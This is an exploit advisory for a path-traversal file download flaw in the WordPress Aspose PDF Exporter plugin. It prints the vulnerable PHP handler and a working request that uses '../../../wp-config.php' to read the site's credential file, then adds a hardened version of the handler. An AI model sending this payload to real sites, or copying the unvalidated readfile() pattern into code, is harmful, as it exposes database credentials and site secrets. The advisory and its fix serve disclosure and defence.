
WordPress Aspose PDF Exporter File Download

Posted on 31 March 2015

Exploit Title   : WordPress Aspose-pdf-exporter Plugin File Download Vulnerability
Exploit Author  : Ashiyane Digital Security Team
Vendor Homepage : https://wordpress.org/plugins/aspose-pdf-exporter/
Download Link   : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip
Date            : 28 / 3 / 2015
Tested On       : Windows 8.1 + Kali Linux

#########################################

Exploit:

[+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php

Vulnerable Code :

<?php
// The path comes straight from the query string with no validation.
$file = $_GET['file'];
$file_arr = explode('/',$file);
// Only the name shown to the browser is reduced to the last path component.
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
// filesize() and readfile() still receive the full, unvalidated path.
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>

http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=[File Address]

Examples :

http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php

#########################################

Discovered by : Rq07

#########################################
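A hardened form of the download handler shown above, added here as an example; it is not the plugin's or the vendor's code. EXPORT_DIR and resolve_export() are hypothetical names, and the assumption that exported files are PDFs kept in a single directory is not stated on the page.

```php
<?php
// Added example (PHP 7.1+). EXPORT_DIR is a hypothetical location for the
// exported PDFs; the page does not say where the plugin stores them.
define('EXPORT_DIR', __DIR__ . '/exports');

/**
 * Map a user-supplied name to a file inside $base, or return null.
 * Hypothetical helper, not part of the plugin.
 */
function resolve_export(string $requested, string $base): ?string
{
    // Keep only the last path component, treating both separators alike,
    // so "../../../wp-config.php" is reduced to "wp-config.php".
    $name = basename(str_replace('\\', '/', $requested));

    // Allow-list: plain *.pdf names only. This rejects wp-config.php and
    // also keeps quotes, CR/LF and NUL out of the response header below.
    if (!preg_match('/\A[A-Za-z0-9._-]+\.pdf\z/', $name)) {
        return null;
    }

    // Canonicalise both paths; realpath() also resolves symlinks and
    // returns false when the target does not exist.
    $baseReal = realpath($base);
    $full     = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $full === false) {
        return null;
    }

    // Containment check: the resolved file must sit under the base directory.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0 || !is_file($full)) {
        return null;
    }
    return $full;
}

// An array-valued ?file[]=... is treated as an empty request.
$param = $_GET['file'] ?? '';
$path  = is_string($param) ? resolve_export($param, EXPORT_DIR) : null;
if ($path === null) {
    http_response_code(404);
    exit;
}

header('Content-Type: application/pdf');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit;
```

The example covers path validation only; the handler on the page also performs no authentication or capability check before serving a file.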

 
